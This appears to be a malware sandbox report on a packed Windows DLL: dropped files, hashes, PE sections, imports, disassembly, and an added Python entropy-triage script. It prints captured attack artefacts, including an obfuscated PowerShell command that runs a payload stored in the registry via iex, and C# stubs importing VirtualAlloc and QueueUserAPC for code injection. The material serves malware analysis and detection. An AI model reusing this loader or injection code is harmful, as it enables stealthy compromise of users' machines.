                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1531936" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11606
                          Entropy (8bit):4.883977562702998
                          Encrypted:false
                          SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                          MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                          SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                          SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                          SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                          Malicious:false
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.0931050765106587
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfVak7YnqqiaPN5Dlq5J:+RI+ycuZhNNVakSiaPNnqX
                          MD5:02C3662D4C9E197ADEB1CC2C6BEF46F5
                          SHA1:6D53EC3C48A5D1F25B32D59AF0A15740CD65E193
                          SHA-256:F951EA74829FCE379D430EA52C6E67402CAAFF04DF0906D7EDB4B76ABB963562
                          SHA-512:B8B6BF53159D147A25FFBDA73400B6119FAD651F0E32F7C2A8A9220D4B6EA7121B1AE8B481CC2E5AC98E8BC3F9094744D8A29DC45866E6035FC8E1BD10ACCF93
                          Malicious:false
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1133483598409657
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBak7YnqqFPN5Dlq5J:+RI+ycuZhNjakSFPNnqX
                          MD5:9539704CDC4933899E44EEFA3C61D608
                          SHA1:CA3ABD82D814B1679ED449248896A5BABBA9DAF4
                          SHA-256:7E05C7E8A8EE0D2E2C90BF4126DD2714DF469CD920B9832C55B58EC9B6E6B4AE
                          SHA-512:7A390EC42F2509B75B40C31CE05F239096555CF51B45693482675B7B18B46359F9707DD959CD8750BF3588EA4A7114981C54145AC517265082ECAFEE39CAC0C4
                          Malicious:false
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                          Category:dropped
                          Size (bytes):1320
                          Entropy (8bit):3.9822378198203157
                          Encrypted:false
                          SSDEEP:24:HR3nW9rtjHQTKhHvYhKdNWI+ycuZhNjakSFPNnq9hgd:JWxQaPaKd41ulja3fq9y
                          MD5:09B3C60D2220594D5764CF805341CC0E
                          SHA1:555EEEB4FCC58F515C25005F000D88686B04AD32
                          SHA-256:3EFC57A094F328BBEA3EB475295462DA3C26FB3F3FED6AB0EB25D35F263150A3
                          SHA-512:C30E50256D1C37B63EAF9EE1C2379EAD807A4BBA2173D8444640EDFBF553D3784E1F75A5E6AF57719B6088E6BB562D50B1F21C592484BAEEA0C333ED93643D0B
                          Malicious:false
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols
                          Category:dropped
                          Size (bytes):1320
                          Entropy (8bit):3.9747905175308915
                          Encrypted:false
                          SSDEEP:24:H/nW9r00ehHnfhKdNWI+ycuZhNNVakSiaPNnq9hgd:vW00iH5Kd41ulNVa3iWq9y
                          MD5:72B817498A9CB15C74DD2FA541EC0561
                          SHA1:7E91DCA4483F6E04A51ADC829DA393235EBD810A
                          SHA-256:779F0A35D8986CABDE9796A33471BAC978357938416782ECDB889D7A99FE3373
                          SHA-512:B007342425DCA6B16FFED7589285344882DFB6F2CFB1A4808F3F7131605316DC5ADE93426A7AEA4052E2F030018F7A78672F5DF83F72EF86D86A8963AE936148
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):403
                          Entropy (8bit):5.058106976759534
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                          MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                          SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                          SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                          SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                          Malicious:false
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):351
                          Entropy (8bit):5.267478878877476
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxzxs7+AEszIWXp+N23fAx:p37Lvkmb6KHZWZE8E
                          MD5:F09794D488DBC35AA92B8C90362AB28B
                          SHA1:AFFAAEE2DBD7D8C475CEEBB8815C8614545FEEC4
                          SHA-256:3AAF9335F5405A242AA66C1A9CEE285868C0727DC4A61E05AC0FE7113AC7685E
                          SHA-512:F9474796B81FD1A7A2D5FBE9F862BBEA8C8B5DF20F74113A621D38A38BCECC9018BEC80A488C504AF49CA8346A478CE8B445700206666BE1E7C25C7D03D01876
                          Malicious:false
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b5khtopv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b5khtopv.0.cs"
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6227922787586184
                          Encrypted:false
                          SSDEEP:24:etGSQ8OmU0t3lm85xWAseO4zKQ64pfUPtkZfvk1jVUWI+ycuZhNjakSFPNnq:6qXQ3r5xNORQfUuJvk1x31ulja3fq
                          MD5:BA975FCAFEA5BC2179880CE7E01A1CE9
                          SHA1:89AA86AEE421A044758CED62E646EC441E4D19AA
                          SHA-256:9CBC012D926A95136E9FD40E9C658E31C21CDB26E8B32A08B4AF800E87DD8393
                          SHA-512:F7FDF23A020418EE7AE7E7FBF41EB20F14E97BC3D8F8A6440AF87DF605374A779BD37467EA49E7957ECB4BC9AD996A2D026B0ED28F9360A88DE274F68D54786F
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):848
                          Entropy (8bit):5.323228230759943
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KHZWZE8RKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH+E8RKaM5DqBVKVrdFAMBJTH
                          MD5:A0732BCB2CCDA94D5B47A60F929FDA61
                          SHA1:D0287555EE56BB8426AE01086C1DAAB0E0F4F236
                          SHA-256:AC734E3395B9C500CC77255FF2529DE39CB0A83D451B49D7569F5C2C69BAAF40
                          SHA-512:EB660C6A09D0566935FF383D15F6A68C0BD0F45D6ED35D7708913C9F4CFEF59CA4067BB52766BF798DF02292E41019A6CD004767FB628AF9BE44272CDAA44B1D
                          Malicious:false
                          Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b5khtopv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b5khtopv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):392
                          Entropy (8bit):4.988829579018284
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                          MD5:80545CB568082AB66554E902D9291782
                          SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                          SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                          SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                          Malicious:false
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):351
                          Entropy (8bit):5.263922468747438
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxC10zxs7+AEszIWXp+N23fxCdx:p37Lvkmb6KHpC10WZE8pCdx
                          MD5:26231D50B2E9AE0CA2486C11856271F6
                          SHA1:D298368A287C8C654C2AD890F58E1101C89C6EA8
                          SHA-256:835E5B1E3D6F2806D2371B4160EACC27A46F424879338811A286CAC5D101BB9A
                          SHA-512:45534EB37809F3DBBF99142A0E0C72BF02C0715C39A05DA35955F112BA8AA167A05DCBE595D4A14A44D011190CA91BC6902D8B0C39B5E3AEDDAAEC208B65F239
                          Malicious:false
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kikzslfg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kikzslfg.0.cs"
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.5937782577305875
                          Encrypted:false
                          SSDEEP:24:etGStE/u2Bg85z7xlfwZD6BgdWqtkZfrOHWI+ycuZhNNVakSiaPNnq:6ttYb5hFCD6MWdJr11ulNVa3iWq
                          MD5:3D1BB357CA2468341DC1D0CD0CBDE50C
                          SHA1:E3012818931B5770C9EEE1842C196200084ED3B6
                          SHA-256:33F58C94D43F3F42D1A83E10568235E6BEB88B6A89634140390607FC845AF545
                          SHA-512:4D01A41FDBB5375DC04F659F6EE2499F0A3F27F650BE8F7CBCC7ED0136BE8D19CA31E003700B4D3B1F14AF6745AD9EB50AD4F82082FFFD9589DAF184790FBB6A
                          Malicious:false
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):848
                          Entropy (8bit):5.323727982984064
                          Encrypted:false
                          SSDEEP:24:AId3ka6KHiE8EUKaM5DqBVKVrdFAMBJTH:Akka6AiE8dKxDcVKdBJj
                          MD5:38B9762A37D60558FC21EF41B824F2A0
                          SHA1:4E987BFAEC62799D5483B2E8F93A3020C751FC30
                          SHA-256:B946DFDE616FFF8EC403135CE6C2AE909E6A48C983880262A3307DC9140F69AA
                          SHA-512:6FEB9920BB44D00C561F65DD97E3FA15AF546ACEC2B5656F6DF711F1FB03073F9289265F83ED7DCE5364B94AEC7D28AFB1F78F16D4F61353547841EF80B6D914
                          Malicious:false
                          Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\kikzslfg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\kikzslfg.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1367
                          Entropy (8bit):5.3900988864716135
                          Encrypted:false
                          SSDEEP:24:BxSA/DoCxvBnKx2DOXUW/pvLCHcKo4qWFHjeTKKjX4CIym1ZJXnDfpvLCHcKo4AO:BZ/c+vhKoOfpMlo4tFqDYB1ZJrpMlo4P
                          MD5:AEBC39EB79C9C79BE09DC92C39A235C9
                          SHA1:68CD50B3E46C3D14867EA2E6C7B2CFF6AF055B18
                          SHA-256:4E4703A45109ADCD12197DDC332C84B45AFCA38DDE5B515A31CB93F31D694F65
                          SHA-512:4E2E2D52A15D894753F12CBEAEA480C3787D30888CBDC2957688617DD2C4A1E442290E86E4E8678A262762B1564C679046BDA7FE48ED5F4AFA866F2F1232A91B
                          Malicious:false
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220526040705..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 530978 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6564..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220526040705..**********************..PS>new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftd
                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.281218339920859
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:lokvQRcUe0.dll
                          File size:438272
                          MD5:5de5e3440620950f0be99fc6728c7afe
                          SHA1:43cbdfe6773ce518847b89f177a555e6bece283b
                          SHA256:2d83e172a42b032b32606b203f2a1a9736acfd86e76ede8ff57b3292c035d139
                          SHA512:674a545d51127efec4ad74ff97d6836a5a7c3f6c186de5a0be18bd1c619de4ffcd166409f52624b046ce4e48a0c432c2e19f6008741b8f117434229121f05c0e
                          SSDEEP:6144:SKmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:SsBUSzjLIRBMkf9dHLpKepKr6CvXG
                          TLSH:1C94F14897685D66D84647370CE1931EFCE7FE2EE63B7ABE20642C8FF95B0104516B0A
                          File Content Preview:MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...
                          Icon Hash:9068eccc64f6e2ad
                          Entrypoint:0x401520
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                          DLL Characteristics:TERMINAL_SERVER_AWARE
                          Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:8000dfa78ad003480e4532227762516a
                          Instruction
                          push ebp
                          mov ebp, esp
                          inc edx
                          add ecx, FFFFFFFFh
                          call 00007F5484979D7Ah
                          pop eax
                          pop eax
                          mov dword ptr [004136F4h], eax
                          mov edx, dword ptr [00413810h]
                          sub edx, 00005289h
                          call edx
                          mov eax, ebx
                          mov dword ptr [004136F0h], eax
                          mov eax, esi
                          mov dword ptr [004136E8h], eax
                          mov dword ptr [004136F8h], ebp
                          mov dword ptr [004136ECh], edi
                          add dword ptr [004136F8h], 00000004h
                          loop 00007F5484979D27h
                          mov dword ptr [ebp+00h], eax
                          nop
                          nop
                          mov ah, 03h
                          sbb byte ptr [ebp+6Fh], FFFFFF82h
                          and dword ptr [ecx+0Bh], esp
                          out D4h, al
                          or cl, byte ptr [esi]
                          mov eax, dword ptr [0B7E1EADh]
                          in eax, dx
                          shr dword ptr [edi-49h], 1
                          push ebx
                          movsd
                          jmp 00007F540FFF410Bh
                          imul dh
                          mov eax, dword ptr [F34D615Bh]
                          call 00007F5417E6CD1Ch
                          xlatb
                          pop esp
                          cmp dl, dh
                          salc
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830485026042 | data | 1.12968558601 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0xbea | 0x1000 | False | 0.286865234375 | data | 4.80937731513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380004882812 | data | 5.99890283293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
.reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ
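The section table is the quickest static tell on this sample: the .text section that holds the entry point has an entropy of only 1.13, while the two oddly named, writable sections .crt and .erloc sit at 7.98, which is what a compressed or encrypted payload that gets unpacked at runtime looks like. The Python below is an added example and not part of the Joe Sandbox report. It recomputes the measure behind the Entropy column from raw bytes (with the sample on disk you would feed each section's raw data to it) and applies the heuristics just described to the rows above; the threshold values and the list of common section names are assumptions chosen for illustration.

```python
import math
from collections import Counter

# Section names a normally linked PE tends to carry. Illustrative, not exhaustive.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                   ".edata", ".pdata", ".bss", ".tls", ".CRT", ".gfids"}


def shannon_entropy(data):
    """Shannon entropy in bits per byte, the quantity in the Entropy column."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(count / total * math.log2(count / total)
                for count in Counter(data).values())


# The rows of the section table above: (name, virtual size, raw size, entropy,
# characteristics) with the IMAGE_SCN_ prefix trimmed.
SECTIONS = [
    (".text",  0xb8c0,  0xc000,  1.12968558601, {"MEM_EXECUTE", "CNT_CODE", "MEM_READ"}),
    (".rdata", 0xbea,   0x1000,  4.80937731513, {"CNT_INITIALIZED_DATA", "MEM_READ"}),
    (".data",  0x7b80,  0x6000,  5.99890283293, {"CNT_INITIALIZED_DATA", "MEM_WRITE", "MEM_READ"}),
    (".crt",   0x1dc01, 0x1e000, 7.98104004555, {"CNT_INITIALIZED_DATA", "MEM_WRITE", "MEM_READ"}),
    (".erloc", 0x2c91e, 0x2d000, 7.98142116636, {"CNT_INITIALIZED_DATA", "MEM_WRITE", "MEM_READ"}),
    (".rsrc",  0x9f28,  0xa000,  6.51666400073, {"CNT_CODE", "MEM_READ"}),
    (".reloc", 0x133a,  0x2000,  3.75989927364, {"CNT_INITIALIZED_DATA", "MEM_DISCARDABLE", "MEM_READ"}),
]


def triage_sections(sections, packed=7.0, empty_code=2.0):
    """Flag sections whose name, entropy or flags point at a packed payload.

    packed and empty_code are illustrative thresholds in bits per byte.
    """
    findings = []
    for name, _vsize, _rsize, entropy, flags in sections:
        reasons = []
        if name not in COMMON_SECTIONS:
            reasons.append("non-standard section name")
        if entropy >= packed:
            reasons.append(f"entropy {entropy:.2f}: compressed or encrypted content")
        if "MEM_WRITE" in flags and entropy >= packed:
            reasons.append("writable high-entropy blob: decrypted in place at runtime")
        if "CNT_CODE" in flags and entropy < empty_code:
            reasons.append(f"code section with entropy {entropy:.2f}: mostly padding, "
                           "the real code arrives after unpacking")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage_sections(SECTIONS):
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On these rows .text, .crt and .erloc are flagged and the rest pass, which matches the dynamic findings in the overview (code injection into explorer.exe after the payload has been unpacked in memory).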
Name | RVA | Size | Type | Language | Country
RT_BITMAP | 0x61360 | 0x666 | data | English | United States
RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
RT_ICON | 0x687d0 | 0xea8 | data | English | United States
RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States
RT_DIALOG | 0x6a540 | 0x120 | data | English | United States
RT_DIALOG | 0x6a660 | 0x158 | data | English | United States
RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States
RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States
RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States
RT_DIALOG | 0x6ab58 | 0xee | data | English | United States
RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States
RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
DLL | Import
ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
msvcrt.dll | fgetwc, strcoll
USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape
OLEAUT32.dll | LoadTypeLibEx
KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree
Description | Data
LegalCopyright | A Company. All rights reserved.
InternalName |
FileVersion | 1.0.0.0
CompanyName | A Company
ProductName |
ProductVersion | 1.0.0.0
FileDescription |
OriginalFilename | myfile.exe
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken
English | United States
